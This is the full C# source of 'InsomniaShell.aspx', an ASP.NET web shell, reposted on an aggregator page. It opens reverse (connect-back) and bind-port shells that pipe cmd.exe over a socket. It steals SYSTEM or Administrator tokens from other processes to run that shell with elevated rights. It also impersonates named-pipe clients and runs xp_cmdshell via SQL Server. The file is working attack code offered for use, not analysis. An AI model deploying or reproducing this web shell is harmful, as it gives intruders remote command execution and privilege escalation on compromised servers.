
来源:互联网 发布:知乎每日精选 rss 编辑:程序博客网 时间:2024/06/07 16:58
<%@ Page Language="C#" %><%@ Import Namespace="System.Runtime.InteropServices" %><%@ Import Namespace="System.Net" %><%@ Import Namespace="System.Net.Sockets" %><%@ Import Namespace="System.Security.Principal" %><%@ Import Namespace="System.Data.SqlClient" %><script runat="server">//--------------------------------------------------------//    INSOMNIA SECURITY :: InsomniaShell.aspx////          .aspx shell helper page// :: Some c token code portions borrowed from ppl such as// Cesar Cerrudo and Matt Conover //--------------------------------------------------------// Some Bollox To Do Socket Shells With .net// throw in some more to do token impersonation// and a bit more for namedpipe impersonation//--------------------------------------------------------    [StructLayout(LayoutKind.Sequential)]    public struct STARTUPINFO    {        public int cb;        public String lpReserved;        public String lpDesktop;        public String lpTitle;        public uint dwX;        public uint dwY;        public uint dwXSize;        public uint dwYSize;        public uint dwXCountChars;        public uint dwYCountChars;        public uint dwFillAttribute;        public uint dwFlags;        public short wShowWindow;        public short cbReserved2;        public IntPtr lpReserved2;        public IntPtr hStdInput;        public IntPtr hStdOutput;        public IntPtr hStdError;    }    [StructLayout(LayoutKind.Sequential)]    public struct PROCESS_INFORMATION    {        public IntPtr hProcess;        public IntPtr hThread;        public uint dwProcessId;        public uint dwThreadId;    }    [StructLayout(LayoutKind.Sequential)]    public struct SECURITY_ATTRIBUTES    {        public int Length;        public IntPtr lpSecurityDescriptor;        public bool bInheritHandle;    }            [DllImport("kernel32.dll")]    static extern bool CreateProcess(string lpApplicationName,       string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,       ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles,       uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory,       [In] ref STARTUPINFO lpStartupInfo,       out PROCESS_INFORMATION lpProcessInformation);    public static uint INFINITE = 0xFFFFFFFF;        [DllImport("kernel32", SetLastError = true, ExactSpelling = true)]    internal static extern Int32 WaitForSingleObject(IntPtr handle, Int32 milliseconds);    internal struct sockaddr_in    {        /// <summary>        /// Protocol family indicator.        /// </summary>        public short sin_family;        /// <summary>        /// Protocol port.        /// </summary>        public short sin_port;        /// <summary>        /// Actual address value.        /// </summary>        public int sin_addr;        /// <summary>        /// Address content list.        /// </summary>        //[MarshalAs(UnmanagedType.LPStr, SizeConst=8)]        //public string sin_zero;        public long sin_zero;    }    [DllImport("kernel32.dll")]    static extern IntPtr GetStdHandle(int nStdHandle);    [DllImport("kernel32.dll")]    static extern bool SetStdHandle(int nStdHandle, IntPtr hHandle);    public const int STD_INPUT_HANDLE = -10;    public const int STD_OUTPUT_HANDLE = -11;    public const int STD_ERROR_HANDLE = -12;        [DllImport("kernel32")]    static extern bool AllocConsole();    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]    internal static extern IntPtr WSASocket([In] AddressFamily addressFamily,                                            [In] SocketType socketType,                                            [In] ProtocolType protocolType,                                            [In] IntPtr protocolInfo,                                             [In] uint group,                                            [In] int flags                                            );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]    internal static extern int inet_addr([In] string cp);    [DllImport("ws2_32.dll")]    private static extern string inet_ntoa(uint ip);    [DllImport("ws2_32.dll")]    private static extern uint htonl(uint ip);        [DllImport("ws2_32.dll")]    private static extern uint ntohl(uint ip);        [DllImport("ws2_32.dll")]    private static extern ushort htons(ushort ip);        [DllImport("ws2_32.dll")]    private static extern ushort ntohs(ushort ip);          [DllImport("WS2_32.dll", CharSet=CharSet.Ansi, SetLastError=true)]   internal static extern int connect([In] IntPtr socketHandle,[In] ref sockaddr_in socketAddress,[In] int socketAddressSize);    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern int send(                                [In] IntPtr socketHandle,                                [In] byte[] pinnedBuffer,                                [In] int len,                                [In] SocketFlags socketFlags                                );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern int recv(                                [In] IntPtr socketHandle,                                [In] IntPtr pinnedBuffer,                                [In] int len,                                [In] SocketFlags socketFlags                                );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern int closesocket(                                       [In] IntPtr socketHandle                                       );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern IntPtr accept(                                  [In] IntPtr socketHandle,                                  [In, Out] ref sockaddr_in socketAddress,                                  [In, Out] ref int socketAddressSize                                  );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern int listen(                                  [In] IntPtr socketHandle,                                  [In] int backlog                                  );    [DllImport("WS2_32.dll", CharSet = CharSet.Ansi, SetLastError = true)]   internal static extern int bind(                                [In] IntPtr socketHandle,                                [In] ref sockaddr_in  socketAddress,                                [In] int socketAddressSize                                );   public enum TOKEN_INFORMATION_CLASS   {       TokenUser = 1,       TokenGroups,       TokenPrivileges,       TokenOwner,       TokenPrimaryGroup,       TokenDefaultDacl,       TokenSource,       TokenType,       TokenImpersonationLevel,       TokenStatistics,       TokenRestrictedSids,       TokenSessionId   }   [DllImport("advapi32", CharSet = CharSet.Auto)]   public static extern bool GetTokenInformation(       IntPtr hToken,       TOKEN_INFORMATION_CLASS tokenInfoClass,       IntPtr TokenInformation,       int tokeInfoLength,       ref int reqLength);   public enum TOKEN_TYPE   {       TokenPrimary = 1,       TokenImpersonation   }   public enum SECURITY_IMPERSONATION_LEVEL   {       SecurityAnonymous,       SecurityIdentification,       SecurityImpersonation,       SecurityDelegation   }      [DllImport("advapi32.dll", EntryPoint = "CreateProcessAsUser", SetLastError = true, CharSet = CharSet.Ansi, CallingConvention = CallingConvention.StdCall)]   public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,       ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,       String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);   [DllImport("advapi32.dll", EntryPoint = "DuplicateTokenEx")]   public extern static bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess,       ref SECURITY_ATTRIBUTES lpThreadAttributes, SECURITY_IMPERSONATION_LEVEL ImpersonationLeve, TOKEN_TYPE TokenType,       ref IntPtr DuplicateTokenHandle);      const int ERROR_NO_MORE_ITEMS = 259;   [StructLayout(LayoutKind.Sequential)]   struct TOKEN_USER   {       public _SID_AND_ATTRIBUTES User;   }   [StructLayout(LayoutKind.Sequential)]   public struct _SID_AND_ATTRIBUTES   {       public IntPtr Sid;       public int Attributes;   }   [DllImport("advapi32", CharSet = CharSet.Auto)]   public extern static bool LookupAccountSid   (       [In, MarshalAs(UnmanagedType.LPTStr)] string lpSystemName, // name of local or remote computer       IntPtr pSid, // security identifier       StringBuilder Account, // account name buffer       ref int cbName, // size of account name buffer       StringBuilder DomainName, // domain name       ref int cbDomainName, // size of domain name buffer       ref int peUse // SID type       // ref _SID_NAME_USE peUse // SID type   );   [DllImport("advapi32", CharSet = CharSet.Auto)]   public extern static bool ConvertSidToStringSid(       IntPtr pSID,       [In, Out, MarshalAs(UnmanagedType.LPTStr)] ref string pStringSid);   [DllImport("kernel32.dll", SetLastError = true)]   public static extern bool CloseHandle(       IntPtr hHandle);   [DllImport("kernel32.dll", SetLastError = true)]   public static extern IntPtr OpenProcess(ProcessAccessFlags dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwProcessId);   [Flags]   public enum ProcessAccessFlags : uint   {       All = 0x001F0FFF,       Terminate = 0x00000001,       CreateThread = 0x00000002,       VMOperation = 0x00000008,       VMRead = 0x00000010,       VMWrite = 0x00000020,       DupHandle = 0x00000040,       SetInformation = 0x00000200,       QueryInformation = 0x00000400,       Synchronize = 0x00100000   }   [DllImport("kernel32.dll")]   static extern IntPtr GetCurrentProcess();   [DllImport("kernel32.dll")]   extern static IntPtr GetCurrentThread();   [DllImport("kernel32.dll", SetLastError = true)]   [return: MarshalAs(UnmanagedType.Bool)]   static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,      IntPtr hSourceHandle, IntPtr hTargetProcessHandle, out IntPtr lpTargetHandle,      uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);    [DllImport("psapi.dll", SetLastError = true)]    public static extern bool EnumProcessModules(IntPtr hProcess,    [MarshalAs(UnmanagedType.LPArray, ArraySubType = UnmanagedType.U4)] [In][Out] uint[] lphModule,    uint cb,    [MarshalAs(UnmanagedType.U4)] out uint lpcbNeeded);    [DllImport("psapi.dll")]    static extern uint GetModuleBaseName(IntPtr hProcess, uint hModule, StringBuilder lpBaseName, uint nSize);    //-------------------------------------------------------------------------------------------------------------------------------    public const uint PIPE_ACCESS_OUTBOUND = 0x00000002;    public const uint PIPE_ACCESS_DUPLEX = 0x00000003;    public const uint PIPE_ACCESS_INBOUND = 0x00000001;    public const uint PIPE_WAIT = 0x00000000;    public const uint PIPE_NOWAIT = 0x00000001;    public const uint PIPE_READMODE_BYTE = 0x00000000;    public const uint PIPE_READMODE_MESSAGE = 0x00000002;    public const uint PIPE_TYPE_BYTE = 0x00000000;    public const uint PIPE_TYPE_MESSAGE = 0x00000004;    public const uint PIPE_CLIENT_END = 0x00000000;    public const uint PIPE_SERVER_END = 0x00000001;    public const uint PIPE_UNLIMITED_INSTANCES = 255;    public const uint NMPWAIT_WAIT_FOREVER = 0xffffffff;    public const uint NMPWAIT_NOWAIT = 0x00000001;    public const uint NMPWAIT_USE_DEFAULT_WAIT = 0x00000000;    public const uint GENERIC_READ = (0x80000000);    public const uint GENERIC_WRITE = (0x40000000);    public const uint GENERIC_EXECUTE = (0x20000000);    public const uint GENERIC_ALL = (0x10000000);    public const uint CREATE_NEW = 1;    public const uint CREATE_ALWAYS = 2;    public const uint OPEN_EXISTING = 3;    public const uint OPEN_ALWAYS = 4;    public const uint TRUNCATE_EXISTING = 5;    public const int INVALID_HANDLE_VALUE = -1;    public const ulong ERROR_SUCCESS = 0;    public const ulong ERROR_CANNOT_CONNECT_TO_PIPE = 2;    public const ulong ERROR_PIPE_BUSY = 231;    public const ulong ERROR_NO_DATA = 232;    public const ulong ERROR_PIPE_NOT_CONNECTED = 233;    public const ulong ERROR_MORE_DATA = 234;    public const ulong ERROR_PIPE_CONNECTED = 535;    public const ulong ERROR_PIPE_LISTENING = 536;    //-------------------------------------------------------------------------------------------------------------------------------    [DllImport("kernel32.dll", SetLastError = true)]    public static extern IntPtr CreateNamedPipe(        String lpName,                                                                        // pipe name        uint dwOpenMode,                                                                // pipe open mode        uint dwPipeMode,                                                                // pipe-specific modes        uint nMaxInstances,                                                        // maximum number of instances        uint nOutBufferSize,                                                // output buffer size        uint nInBufferSize,                                                        // input buffer size        uint nDefaultTimeOut,                                                // time-out interval        IntPtr pipeSecurityDescriptor                // SD        );    [DllImport("kernel32.dll", SetLastError = true)]    public static extern bool ConnectNamedPipe(        IntPtr hHandle,                                                                        // handle to named pipe        uint lpOverlapped                                        // overlapped structure        );    [DllImport("Advapi32.dll", SetLastError = true)]    public static extern bool ImpersonateNamedPipeClient(        IntPtr hHandle);                                                                        // handle to named pipe    [DllImport("kernel32.dll", SetLastError = true)]    public static extern bool GetNamedPipeHandleState(        IntPtr hHandle,        IntPtr lpState,        IntPtr lpCurInstances,        IntPtr lpMaxCollectionCount,        IntPtr lpCollectDataTimeout,        StringBuilder lpUserName,        int nMaxUserNameSize        );    //------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------                    protected void CallbackShell(string server, int port)    {        // This will do a call back shell to the specified server and port        string request = "Shell enroute.......\n";        Byte[] bytesSent = Encoding.ASCII.GetBytes(request);        IntPtr oursocket = IntPtr.Zero;                sockaddr_in socketinfo;            // Create a socket connection with the specified server and port.        oursocket = WSASocket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.IP, IntPtr.Zero, 0, 0);        // Setup And Bind Socket        socketinfo = new sockaddr_in();                socketinfo.sin_family = (short) AddressFamily.InterNetwork;        socketinfo.sin_addr = inet_addr(server);        socketinfo.sin_port = (short) htons((ushort)port);                //Connect        connect(oursocket, ref socketinfo, Marshal.SizeOf(socketinfo));        send(oursocket, bytesSent, request.Length, 0);        SpawnProcessAsPriv(oursocket);        closesocket(oursocket);                  }    protected void BindPortShell(int port)    {        // This will bind to a port and then send back a shell        string request = "Shell enroute.......\n";        Byte[] bytesSent = Encoding.ASCII.GetBytes(request);        IntPtr oursocket = IntPtr.Zero;        sockaddr_in socketinfo;        // Create a socket connection with the specified server and port.        oursocket = WSASocket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.IP, IntPtr.Zero, 0, 0);        // Setup And Bind Socket        socketinfo = new sockaddr_in();        socketinfo.sin_family = (short)AddressFamily.InterNetwork;        uint INADDR_ANY        =0x00000000;        socketinfo.sin_addr = (int) htonl(INADDR_ANY);        socketinfo.sin_port = (short)htons((ushort) port);        // Bind        bind(oursocket,ref socketinfo,Marshal.SizeOf(socketinfo));        // Lsten                     listen(oursocket, 128);                  // Wait for connection        int socketSize = Marshal.SizeOf(socketinfo);        oursocket = accept(oursocket, ref socketinfo, ref socketSize);                    send(oursocket, bytesSent, request.Length, 0);        SpawnProcessAsPriv(oursocket);        closesocket(oursocket);           }    protected void SpawnProcess(IntPtr oursocket)    {        // Spawn a process to a socket withouth impersonation        bool retValue;        string Application = Environment.GetEnvironmentVariable("comspec");         PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();        STARTUPINFO sInfo = new STARTUPINFO();        SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();        pSec.Length = Marshal.SizeOf(pSec);        sInfo.dwFlags = 0x00000101; // STARTF.STARTF_USESHOWWINDOW | STARTF.STARTF_USESTDHANDLES;        // Set Handles        sInfo.hStdInput = oursocket;        sInfo.hStdOutput = oursocket;        sInfo.hStdError = oursocket;        //Spawn Shell        retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);        // Wait for it to finish        WaitForSingleObject(pInfo.hProcess, (int)INFINITE);    }        protected void GetSystemToken(ref IntPtr DupeToken)    {                            // Enumerate all accessible processes looking for a system token        SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();        sa.bInheritHandle = false;        sa.Length = Marshal.SizeOf(sa);        sa.lpSecurityDescriptor = (IntPtr)0;        // Find Token        IntPtr pTokenType = Marshal.AllocHGlobal(4);        int TokenType = 0;        int cb = 4;        string astring = "";        IntPtr token = IntPtr.Zero;        IntPtr duptoken = IntPtr.Zero;        IntPtr hProc = IntPtr.Zero;        IntPtr usProcess = IntPtr.Zero;        uint pid = 0;        for (pid = 0; pid < 9999; pid += 4)        {            hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);            usProcess = GetCurrentProcess();            if (hProc != IntPtr.Zero)            {                for (int x = 1; x <= 9999; x += 4)                {                    token = (IntPtr)x;                    if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))                    {                        if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))                        {                            TokenType = Marshal.ReadInt32(pTokenType);                            switch ((TOKEN_TYPE)TokenType)                            {                                case TOKEN_TYPE.TokenPrimary:                                    astring = "Primary";                                    break;                                case TOKEN_TYPE.TokenImpersonation:                                    // Get the impersonation level                                    GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);                                    TokenType = Marshal.ReadInt32(pTokenType);                                    switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)                                    {                                        case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:                                            astring = "Impersonation - Anonymous";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:                                            astring = "Impersonation - Identification";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:                                            astring = "Impersonation - Impersonation";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:                                            astring = "Impersonation - Delegation";                                            break;                                    }                                    break;                            }                            // Get user name                            TOKEN_USER tokUser;                            string username;                            const int bufLength = 256;                            IntPtr tu = Marshal.AllocHGlobal(bufLength);                            cb = bufLength;                            GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);                            tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));                            username = DumpAccountSid(tokUser.User.Sid);                            Marshal.FreeHGlobal(tu);                            if (username.ToString() == "NT AUTHORITY\\\\SYSTEM")                            {                                // Coverts a primary token to an impersonation                                if (DuplicateTokenEx(duptoken, GENERIC_ALL, ref sa, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, ref DupeToken))                                {                                    // Display the token type                                    //Response.Output.Write("* Duplicated token is {0}<br>", DisplayTokenType(DupeToken));                                    return;                                }                            }                           }                        CloseHandle(duptoken);                    }                }                CloseHandle(hProc);            }                    }            }        protected void GetAdminToken(ref IntPtr DupeToken)    {                            // Enumerate all accessible processes looking for a system token        SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();        sa.bInheritHandle = false;        sa.Length = Marshal.SizeOf(sa);        sa.lpSecurityDescriptor = (IntPtr)0;        // Find Token        IntPtr pTokenType = Marshal.AllocHGlobal(4);        int TokenType = 0;        int cb = 4;        string astring = "";        IntPtr token = IntPtr.Zero;        IntPtr duptoken = IntPtr.Zero;        IntPtr hProc = IntPtr.Zero;        IntPtr usProcess = IntPtr.Zero;        uint pid = 0;        for (pid = 0; pid < 9999; pid += 4)        {            hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);            usProcess = GetCurrentProcess();            if (hProc != IntPtr.Zero)            {                for (int x = 1; x <= 9999; x += 4)                {                    token = (IntPtr)x;                    if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))                    {                        if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))                        {                            TokenType = Marshal.ReadInt32(pTokenType);                            switch ((TOKEN_TYPE)TokenType)                            {                                case TOKEN_TYPE.TokenPrimary:                                    astring = "Primary";                                    break;                                case TOKEN_TYPE.TokenImpersonation:                                    // Get the impersonation level                                    GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);                                    TokenType = Marshal.ReadInt32(pTokenType);                                    switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)                                    {                                        case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:                                            astring = "Impersonation - Anonymous";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:                                            astring = "Impersonation - Identification";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:                                            astring = "Impersonation - Impersonation";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:                                            astring = "Impersonation - Delegation";                                            break;                                    }                                    break;                            }                            // Get user name                            TOKEN_USER tokUser;                            string username;                            const int bufLength = 256;                            IntPtr tu = Marshal.AllocHGlobal(bufLength);                            cb = bufLength;                            GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);                            tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));                            username = DumpAccountSid(tokUser.User.Sid);                            Marshal.FreeHGlobal(tu);                              if (username.EndsWith("Administrator"))                            {                                // Coverts a primary token to an impersonation                                if (DuplicateTokenEx(duptoken, GENERIC_ALL, ref sa, SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, TOKEN_TYPE.TokenPrimary, ref DupeToken))                                {                                    // Display the token type                                    //Response.Output.Write("* Duplicated token is {0}<br>", DisplayTokenType(DupeToken));                                    return;                                }                            }                           }                        CloseHandle(duptoken);                    }                }                CloseHandle(hProc);            }                    }            }        protected void SpawnProcessAsPriv(IntPtr oursocket)    {        // Spawn a process to a socket                bool retValue;        string Application = Environment.GetEnvironmentVariable("comspec");         PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION();        STARTUPINFO sInfo = new STARTUPINFO();        SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES();        pSec.Length = Marshal.SizeOf(pSec);        sInfo.dwFlags = 0x00000101; // STARTF.STARTF_USESHOWWINDOW | STARTF.STARTF_USESTDHANDLES;        IntPtr DupeToken = new IntPtr(0);                // Get the token        GetSystemToken(ref DupeToken);                if (DupeToken == IntPtr.Zero)                                                GetAdminToken(ref DupeToken);                // Display the token type        //Response.Output.Write("* Creating shell as {0}<br>", DisplayTokenType(DupeToken));                                    // Set Handles        sInfo.hStdInput = oursocket;        sInfo.hStdOutput = oursocket;        sInfo.hStdError = oursocket;        //Spawn Shell        if (DupeToken == IntPtr.Zero)                   retValue = CreateProcess(Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);        else            retValue = CreateProcessAsUser(DupeToken, Application, "", ref pSec, ref pSec, true, 0, IntPtr.Zero, null, ref sInfo, out pInfo);        // Wait for it to finish        WaitForSingleObject(pInfo.hProcess, (int)INFINITE);        //Close It all up        CloseHandle(DupeToken);    }    //--------------------------------------------------------    // Display the type of token and the impersonation level    //--------------------------------------------------------    protected StringBuilder DisplayTokenType(IntPtr token)    {        IntPtr pTokenType = Marshal.AllocHGlobal(4);        int TokenType = 0;        int cb = 4;        StringBuilder sb = new StringBuilder();        GetTokenInformation(token, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb);        TokenType = Marshal.ReadInt32(pTokenType);        switch ((TOKEN_TYPE)TokenType)        {            case TOKEN_TYPE.TokenPrimary:                sb.Append("Primary");                break;            case TOKEN_TYPE.TokenImpersonation:                // Get the impersonation level                GetTokenInformation(token, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);                TokenType = Marshal.ReadInt32(pTokenType);                switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)                {                    case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:                        sb.Append("Impersonation - Anonymous");                        break;                    case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:                        sb.Append("Impersonation - Identification");                        break;                    case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:                        sb.Append("Impersonation - Impersonation");                        break;                    case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:                        sb.Append("Impersonation - Delegation");                        break;                }                break;        }        Marshal.FreeHGlobal(pTokenType);        return sb;    }    protected void DisplayCurrentContext()    {        Response.Output.Write("* Thread executing as {0}, token is {1}<br>", WindowsIdentity.GetCurrent().Name, DisplayTokenType(WindowsIdentity.GetCurrent().Token));    }    protected string DumpAccountSid(IntPtr SID)    {        int cchAccount = 0;        int cchDomain = 0;        int snu = 0;        StringBuilder sb = new StringBuilder();        // Caller allocated buffer        StringBuilder Account = null;        StringBuilder Domain = null;        bool ret = LookupAccountSid(null, SID, Account, ref cchAccount, Domain, ref cchDomain, ref snu);        if (ret == true)            if (Marshal.GetLastWin32Error() == ERROR_NO_MORE_ITEMS)                return "Error";        try        {            Account = new StringBuilder(cchAccount);            Domain = new StringBuilder(cchDomain);            ret = LookupAccountSid(null, SID, Account, ref cchAccount, Domain, ref cchDomain, ref snu);            if (ret)            {                sb.Append(Domain);                sb.Append(@"\\");                sb.Append(Account);            }            else                sb.Append("logon account (no name) ");        }        catch (Exception ex)        {            Console.WriteLine(ex.Message);        }        finally        {        }        //string SidString = null;                //ConvertSidToStringSid(SID, ref SidString);        //sb.Append("\nSID: ");        //sb.Append(SidString);        return sb.ToString();    }        protected string GetProcessName(uint PID)    {        IntPtr hProc = IntPtr.Zero;        uint[] hMod = new uint[2048];        uint cbNeeded;        int exeNameSize = 255;        StringBuilder exeName = null;                exeName = new StringBuilder(exeNameSize);                        hProc = OpenProcess(ProcessAccessFlags.QueryInformation | ProcessAccessFlags.VMRead, false, PID);                if (hProc != IntPtr.Zero)        {            if (EnumProcessModules(hProc, hMod, UInt32.Parse(hMod.Length.ToString()), out cbNeeded))            {                GetModuleBaseName(hProc, hMod[0],  exeName, (uint)exeNameSize);            }                    }                CloseHandle( hProc );        return exeName.ToString();    }            //***************************************************************************    // DISPLAY THE AVAILABLE TOKENS    //***************************************************************************        protected void DisplayAvailableTokens()    {        IntPtr pTokenType = Marshal.AllocHGlobal(4);        int TokenType = 0;        int cb = 4;        string astring = "";        IntPtr token = IntPtr.Zero;        IntPtr duptoken = IntPtr.Zero;        IntPtr hProc = IntPtr.Zero;        IntPtr usProcess = IntPtr.Zero;                uint pid = 0;        for (pid = 0; pid < 9999; pid+=4)        {            hProc = OpenProcess(ProcessAccessFlags.DupHandle, false, pid);            usProcess = GetCurrentProcess();            if (hProc != IntPtr.Zero)            {                //Response.Output.Write("Opened process PID: {0} : {1}<br>", pid, GetProcessName(pid));                for (int x = 1; x <= 9999; x+=4)                {                    token = (IntPtr)x;                    if (DuplicateHandle(hProc, token, usProcess, out duptoken, 0, false, 2))                    {                        //Response.Output.Write("Duplicated handle: {0}<br>", x);                        if (GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenType, pTokenType, 4, ref cb))                        {                            TokenType = Marshal.ReadInt32(pTokenType);                            switch ((TOKEN_TYPE)TokenType)                            {                                case TOKEN_TYPE.TokenPrimary:                                    astring = "Primary";                                    break;                                case TOKEN_TYPE.TokenImpersonation:                                    // Get the impersonation level                                    GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, pTokenType, 4, ref cb);                                    TokenType = Marshal.ReadInt32(pTokenType);                                    switch ((SECURITY_IMPERSONATION_LEVEL)TokenType)                                    {                                        case SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:                                            astring = "Impersonation - Anonymous";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:                                            astring = "Impersonation - Identification";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:                                            astring = "Impersonation - Impersonation";                                            break;                                        case SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:                                            astring = "Impersonation - Delegation";                                            break;                                    }                                    break;                            }                            // Get user name                            TOKEN_USER tokUser;                            string username;                            const int bufLength = 256;                            IntPtr tu = Marshal.AllocHGlobal(bufLength);                            cb = bufLength;                            GetTokenInformation(duptoken, TOKEN_INFORMATION_CLASS.TokenUser, tu, cb, ref cb);                            tokUser = (TOKEN_USER)Marshal.PtrToStructure(tu, typeof(TOKEN_USER));                            username = DumpAccountSid(tokUser.User.Sid);                            Marshal.FreeHGlobal(tu);                            if (username.ToString()  ==  "NT AUTHORITY\\\\SYSTEM")                                Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid,x, username, astring);                            else if (username.EndsWith("Administrator"))                                Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid,x, username, astring);                            //else                                //Response.Output.Write("[{0:0000}] - {2} : {3}</a><br>", pid, x, username, astring);                        }                        CloseHandle(duptoken);                    }                    else                    {                        //Response.Output.Write("Handle: {0} Error: {1}<br>", x,GetLastError());                    }                }                CloseHandle(hProc);            }            else            {                //Response.Output.Write("Failed to open process PID: {0}<br>", pid);            }        }    }    protected void Page_Load(object sender, EventArgs e)    {    }    protected void butConnectBack_Click(object sender, EventArgs e)    {        String host = txtRemoteHost.Text;        int port = Convert.ToInt32(txtRemotePort.Text);                        CallbackShell(host, port);    }    protected void butBindPort_Click(object sender, EventArgs e)    {        int port = Convert.ToInt32(txtBindPort.Text);        BindPortShell(port);    }    protected void butCreateNamedPipe_Click(object sender, EventArgs e)    {        String pipeName = "\\\\.\\pipe\\" + txtPipeName.Text;        IntPtr hPipe = IntPtr.Zero;        IntPtr secAttr = IntPtr.Zero;        Response.Output.Write("+ Creating Named Pipe: {0}<br>", pipeName);        hPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE | PIPE_WAIT, 2, 0, 0, 0, secAttr);        // Check value        if (hPipe.ToInt32() == INVALID_HANDLE_VALUE)        {            Response.Write("- Failed to create named pipe:");            Response.End();        }        Response.Output.Write("+ Created Named Pipe: {0}<br>", pipeName);        // wait for client to connect           Response.Write("+ Waiting for connection...<br>");        ConnectNamedPipe(hPipe, 0);        // Get connected user info        StringBuilder userName = new StringBuilder(256);        if (!GetNamedPipeHandleState(hPipe, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, userName, userName.Capacity))        {            Response.Write("- Error Getting User Info<br>");            Response.End();        }        Response.Output.Write("+ Connection From Client: {0}<br>", userName);        // assume the identity of the client //        Response.Write("+ Impersonating client...<br>");        if (!ImpersonateNamedPipeClient(hPipe))        {            Response.Write("- Failed to impersonate the named pipe.<br>");            CloseHandle(hPipe);            Response.End();        }              CloseHandle(hPipe);            }    protected void butSQLRequest_Click(object sender, EventArgs e)    {        String pipeName = "\\\\.\\pipe\\" + txtPipeName.Text;        String command = "exec master..xp_cmdshell 'dir > \\\\\\pipe\\" + txtPipeName.Text + "'";        // Make a local sql request to the pipe                String connectionString = "server=;database=master;uid=" + txtSQLUser.Text + ";password=" + txtSQLPass.Text;                // create a new SqlConnection object with the appropriate connection string         SqlConnection sqlConn = new SqlConnection(connectionString);        Response.Output.Write("+ Sending {0}<br>", command);        // open the connection         sqlConn.Open();        // do some operations ...        // create the command object         SqlCommand sqlComm = new SqlCommand(command, sqlConn);        sqlComm.ExecuteNonQuery();        // close the connection        sqlConn.Close();    }  